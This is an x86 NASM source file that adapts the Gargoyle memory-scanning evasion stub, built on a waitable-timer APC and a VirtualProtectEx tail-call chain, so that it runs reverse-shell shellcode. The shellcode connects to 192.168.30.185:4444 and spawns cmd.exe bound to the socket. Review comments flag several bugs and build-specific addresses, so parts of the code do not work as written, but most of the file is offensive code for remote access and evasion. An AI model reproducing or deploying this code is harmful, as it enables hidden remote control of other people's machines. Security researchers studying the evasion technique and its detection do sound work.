Gargoyle setup.nasm modified to execute a reverse shell instead of a MessageBox
BITS 32
; Layout of the caller-supplied workspace. Every field is read through
; [ebx + Configuration.<field>]; nothing in this file writes the API
; pointers, so the loader is expected to fill them in before calling.
STRUC Configuration
.initialized: RESD 1           ; 0 on first entry, set to 1 once the timer is armed
.setup_addr: RESD 1            ; lpAddress for the VirtualProtectEx tail call
.setup_length: RESD 1          ; dwSize for the VirtualProtectEx tail call
.VirtualProtectEx: RESD 1      ; kernel32 function pointer (never written here)
.WaitForSingleObjectEx: RESD 1 ; kernel32 function pointer (never written here)
.CreateWaitableTimer: RESD 1   ; kernel32 function pointer (never written here)
.SetWaitableTimer: RESD 1      ; kernel32 function pointer (never written here)
.MessageBox: RESD 1            ; unused in this variant; the MessageBox example body was replaced
.trampoline_addr: RESD 1       ; lpArgToCompletionRoutine passed to SetWaitableTimer
.sleep_handle: RESD 1          ; HANDLE returned by CreateWaitableTimer
.interval: RESD 1              ; lPeriod passed to SetWaitableTimer
.gadget: RESD 1                ; pfnCompletionRoutine passed to SetWaitableTimer (loader-supplied address)
.shadow: RESD 2                ; 8 scratch bytes: pDueTime (LARGE_INTEGER) for SetWaitableTimer, lpflOldProtect for VirtualProtectEx
.stack: RESB 0x10000           ; 64 KiB private stack; esp is pointed just below .trampoline at entry
.trampoline: RESD 9            ; trampoline[0] is rewritten with VirtualProtectEx at reset_trampoline; the rest is not written by this file
ENDSTRUC
; Call me like void (*__cdecl callable)(void* workspace);
; Entry point. The single cdecl argument is the Configuration block; ebx
; keeps its address for the Gargoyle bookkeeping below, and esp is moved
; onto the block's private .stack (just below .trampoline) so the caller's
; stack is left untouched.
mov ebx, [esp+4] ; Configuration in ebx now
lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack"
mov ebp, esp                                  ; ebp mirrors the private stack base
; If we're initialized, skip to trampoline fixup
; The first call arms the timer; every later call (initialized != 0) only
; refreshes the trampoline slot.
mov edx, [ebx + Configuration.initialized]
cmp edx, 0
jne reset_trampoline
; Create the timer
; CreateWaitableTimer(lpTimerAttributes = NULL, bManualReset = FALSE,
;                     lpTimerName = NULL). stdcall: callee pops the args,
; hence no stack cleanup after the call.
push 0
push 0
push 0
mov ecx, [ebx + Configuration.CreateWaitableTimer]
call ecx
mov [ebx + Configuration.sleep_handle], eax ; NOTE(review): stored unchecked; a NULL handle on failure is passed to the waits later on
; Set the timer
; SetWaitableTimer(hTimer = sleep_handle, pDueTime = &shadow,
;                  lPeriod = interval, pfnCompletionRoutine = gadget,
;                  lpArgToCompletionRoutine = trampoline_addr, fResume = FALSE)
; .shadow is never written by this file, so the due time is whatever the
; loader placed there. The completion routine is the loader-supplied
; .gadget value, not a routine defined in this file.
push 0                                        ; fResume = FALSE
mov ecx, [ebx + Configuration.trampoline_addr]
push ecx                                      ; lpArgToCompletionRoutine
mov ecx, [ebx + Configuration.gadget]
push ecx                                      ; pfnCompletionRoutine
mov ecx, [ebx + Configuration.interval]
push ecx                                      ; lPeriod
lea ecx, [ebx + Configuration.shadow]
push ecx                                      ; pDueTime
mov ecx, [ebx + Configuration.sleep_handle]
push ecx                                      ; hTimer
mov ecx, [ebx + Configuration.SetWaitableTimer]
call ecx
; Set the initialized bit
mov [ebx + Configuration.initialized], dword 1
; Replace the return address on our trampoline
; Reached on every call. Only trampoline[0] is written here; the other
; trampoline words are not touched by this file.
reset_trampoline:
mov ecx, [ebx + Configuration.VirtualProtectEx]
mov [ebx + Configuration.trampoline], ecx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Arbitrary code goes here. Note that the
;;;; default stack is pretty small (65k).
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Payload body (replaces the MessageBox example): load ws2_32, resolve
; WSAStartup / WSASocketA / connect through GetProcAddress, connect out,
; then spawn cmd with its std handles bound to the socket.
; NOTE(review): `global _start` / `section .text` are leftovers from building
; this payload as a standalone file; they appear after code already emitted
; into the default section, and `_start` is only a label here.
; NOTE(review): kernel32 entry points (LoadLibraryA, GetProcAddress,
; CreateProcessA, WinExec) are called through absolute immediates
; (0x75f...). Those values are only meaningful for the specific DLL build
; and load address they were copied from.
; NOTE(review): the first `mov ebx, ...` below overwrites ebx, which until
; now held the Configuration pointer, and `mov ebp, eax` overwrites the
; private stack base kept in ebp. Neither register is saved or restored
; anywhere in this file.
; NOTE(review): no return value in this payload is checked (LoadLibraryA,
; GetProcAddress, WSAStartup, WSASocket, connect, CreateProcess).
global _start
section .text
_start:
; Get the windows socket dll name
xor eax, eax
mov ax, 0x3233        ; bytes 33 32 = "32"; eax was zeroed, so the upper two bytes are the NUL terminator
push eax              ; "32\0\0"
push dword 0x5f327377 ; bytes 77 73 32 5f = "ws2_"; the stack now reads "ws2_32\0"
push esp              ; lpLibFileName
; LoadLibrary
mov ebx, 0x75fb8530 ; LoadLibraryA(libraryname) -- absolute address, build-specific
call ebx
mov ebp, eax ; winsocket dll handle is saved into ebp
; Get the function name: WSAStartup
xor eax, eax
mov ax, 0x7075      ; bytes 75 70 = "up" -> "up\0\0"
push eax
push 0x74726174     ; "tart"
push 0x53415357     ; "WSAS" -> the stack now reads "WSAStartup\0"
push esp            ; lpProcName
push ebp            ; hModule = ws2_32 handle
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname) -- absolute address, build-specific
call ebx
; Call WSAStartup
xor ebx, ebx
mov bx, 0x0190 ; 0x190 = 400 = sizeof(WSADATA)
sub esp, ebx   ; reserve the WSADATA buffer on the private stack; it is never released
push esp       ; lpWSAData
push ebx       ; wVersionRequested = 0x0190, reusing the size constant
               ; NOTE(review): this is not MAKEWORD(2, 2) as the comment below
               ; says; WSAStartup negotiates an over-high request down to the
               ; highest supported version, so the call still succeeds -- TODO confirm
call eax ; WSAStartUp(MAKEWORD(2, 2), wsadata_pointer)
; Get the function name: WSASocketA
xor eax, eax
mov ax, 0x4174      ; bytes 74 41 = "tA" -> "tA\0\0"
push eax
push 0x656b636f     ; "ocke"
push 0x53415357     ; "WSAS" -> the stack now reads "WSASocketA\0"
push esp            ; lpProcName
push ebp            ; hModule = ws2_32 handle
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname) -- absolute address, build-specific
call ebx
; Call WSASocket
; WSASocketA(af, type, protocol, lpProtocolInfo, g, dwFlags), pushed last
; argument first.
xor ebx, ebx
push ebx            ; dwFlags = 0
push ebx            ; g = 0
push ebx            ; lpProtocolInfo = NULL
xor ecx, ecx
mov cl, 6
push ecx            ; protocol = IPPROTO_TCP (6)
inc ebx
push ebx            ; type = SOCK_STREAM (1)
inc ebx
push ebx            ; af = AF_INET (2)
call eax ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
; (unsigned int)NULL, (unsigned int)NULL);
xchg eax, edi ; Save the socket handle into edi (not checked for INVALID_SOCKET); edi survives the stdcall calls below
; Get the function name: connect
mov ebx, 0x74636565 ; bytes 65 65 63 74
shr ebx, 8          ; -> 0x00746365 = "ect\0"
push ebx
push 0x6e6e6f63     ; "conn" -> the stack now reads "connect\0"
push esp            ; lpProcName
push ebp            ; hModule = ws2_32 handle
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname) -- absolute address, build-specific
call ebx
; Call connect
; The sockaddr_in is built in place. Only sin_family, sin_port and sin_addr
; (8 bytes) are written; the other 8 bytes covered by namelen = 16 (sin_zero)
; are whatever already sits on the stack above them.
; The endpoint below is the network indicator hard-coded in this sample:
; TCP 192.168.30.185:4444.
push 0xb91ea8c0 ; sin_addr: bytes c0 a8 1e b9 = 192.168.30.185
push word 0x5c11 ; sin_port: bytes 11 5c = htons(4444)
xor ebx, ebx
add bl, 2
push word bx ; sin_family = AF_INET (2)
mov edx, esp ; edx = &sockaddr_in
push byte 16 ; namelen = sizeof(sockaddr_in)
push edx     ; name
push edi     ; s = the socket from WSASocketA
call eax ; connect(s1, (SOCKADDR*) &hax, sizeof(hax) = 16); return value is not checked
; Call CreateProcess with redirected streams
; Builds "cmd\0", a PROCESS_INFORMATION and a STARTUPINFOA on the stack, then
; calls CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi).
; All three std handles in STARTUPINFOA are the connected socket (edi) and
; bInheritHandles is TRUE, so the child's console I/O is the TCP connection.
; That parent/child shape -- a process holding a TCP socket spawning cmd.exe
; whose stdin/stdout/stderr are that socket -- is the observable that
; host-based detection for this technique keys on.
mov edx, 0x646d6363
shr edx, 8            ; 0x00646d63 -> bytes "cmd\0"
push edx
mov ecx, esp          ; ecx = lpCommandLine -> "cmd"
xor edx, edx          ; edx = 0 / NULL for the rest of this block
sub esp, 16
mov ebx, esp ; PROCESS_INFORMATION
; STARTUPINFOA, pushed last field first (17 DWORDs = 68 bytes):
push edi              ; hStdError  = socket
push edi              ; hStdOutput = socket
push edi              ; hStdInput  = socket
push edx              ; lpReserved2 = NULL
push edx              ; wShowWindow = 0 (SW_HIDE) / cbReserved2 = 0
xor eax, eax
inc eax
rol eax, 8
inc eax               ; eax = 0x101
push eax              ; dwFlags = STARTF_USESTDHANDLES (0x100) | STARTF_USESHOWWINDOW (0x1)
push edx              ; dwFillAttribute
push edx              ; dwYCountChars
push edx              ; dwXCountChars
push edx              ; dwYSize
push edx              ; dwXSize
push edx              ; dwY
push edx              ; dwX
push edx              ; lpTitle
push edx              ; lpDesktop
push edx              ; lpReserved
xor eax, eax
add al, 44            ; cb = 44 decimal (0x2C). NOTE(review): the structure just pushed
                      ; spans 68 bytes (0x44); this reads like a decimal/hex mix-up.
                      ; CreateProcessA is generally lenient about cb -- TODO confirm
push eax
mov eax, esp ; STARTUP_INFO
push ebx ; PROCESS_INFORMATION -> lpProcessInformation
push eax ; STARTUP_INFO        -> lpStartupInfo
push edx              ; lpCurrentDirectory = NULL
push edx              ; lpEnvironment = NULL
push edx              ; dwCreationFlags = 0
xor eax, eax
inc eax
push eax              ; bInheritHandles = TRUE (required for the socket std handles)
push edx              ; lpThreadAttributes = NULL
push edx              ; lpProcessAttributes = NULL
push ecx              ; lpCommandLine = "cmd"
push edx              ; lpApplicationName = NULL
mov ebx, 0x75fc6c10 ; CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi); -- absolute address, build-specific
call ebx
; With ExitProcess commented out, control falls through into the Gargoyle
; tail-call setup below. Note ebx now holds the CreateProcess address
; loaded above (stdcall preserves ebx), not the Configuration pointer.
end:
xor edx, edx
;push eax
;mov eax, 0x75982acf ; ExitProcess(exitcode)
;call eax
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;; Time to setup tail calls to go down
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Lays out a fake call chain on the stack and jumps into it. Reading the
; stack from the top at the final jmp:
;   VirtualProtectEx(-1, setup_addr, setup_length, PAGE_READONLY, &shadow)
;     "returns" into WaitForSingleObjectEx(sleep_handle, INFINITE, TRUE)
;     "returns" into WaitForSingleObjectEx(sleep_handle, INFINITE, TRUE)
;     "returns" to 0 (never expected to run; the timer APC fires during the
;     alertable wait first)
; Each frame is [return address][args...] and relies on the callees being
; stdcall (they pop their own arguments on return).
; NOTE(review): every load below is ebx-relative, but ebx stopped being the
; Configuration pointer at the first `mov ebx, 0x75...` in the payload above
; and at this point still holds the CreateProcess address loaded for the
; last `call ebx`. As written these reads come from that address plus the
; field offset, not from the Configuration block, so the values pushed here
; are not the handles and pointers the comments name.
; Setup arguments for WaitForSingleObjectEx x1
push 1                                          ; bAlertable = TRUE (alertable wait; timer completion routine is delivered here)
push 0xFFFFFFFF                                 ; dwMilliseconds = INFINITE
mov ecx, [ebx + Configuration.sleep_handle]
push ecx                                        ; hHandle
push 0 ; Return address never ret'd
; Setup arguments for WaitForSingleObjectEx x2
push 1                                          ; bAlertable = TRUE
push 0xFFFFFFFF                                 ; dwMilliseconds = INFINITE
mov ecx, [ebx + Configuration.sleep_handle]
push ecx                                        ; hHandle
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx                                        ; "return address" of the first wait -> second wait
; Setup arguments for VirtualProtectEx
lea ecx, [ebx + Configuration.shadow]
push ecx                                        ; lpflOldProtect (reuses .shadow as scratch)
push 2 ; PAGE_READONLY                          ; flNewProtect
mov ecx, [ebx + Configuration.setup_length]
push ecx                                        ; dwSize
mov ecx, [ebx + Configuration.setup_addr]
push ecx                                        ; lpAddress
push dword 0xffffffff                           ; hProcess = current-process pseudo-handle
; Tail call to WaitForSingleObjectEx
mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
push ecx                                        ; "return address" of VirtualProtectEx -> first wait
; Jump to VirtualProtectEx
mov ecx, [ebx + Configuration.VirtualProtectEx]
jmp ecx                                         ; control leaves this file here; nothing below is reachable
; Hardcoded WinExec to execute calc.exe
; NOTE(review): unreachable. Control leaves this file at the `jmp ecx`
; above and no label points into this block; it looks like a leftover test
; payload. Even if it were reached, the closing `mov esp, ebp` would load
; esp from the ws2_32 module handle that was stored in ebp earlier, not
; from the private stack base.
xor eax,eax
push eax             ; NUL terminator
push ".exe"          ; NASM character constant, stored little-endian as ".exe"
push "calc"          ; the stack now reads "calc.exe\0"
mov eax,esp          ; lpCmdLine
push 1               ; uCmdShow = SW_SHOWNORMAL
push eax             ; lpCmdLine
mov ebx, 0x75fef890; WinExec address -- absolute immediate, build-specific
call ebx
mov esp, ebp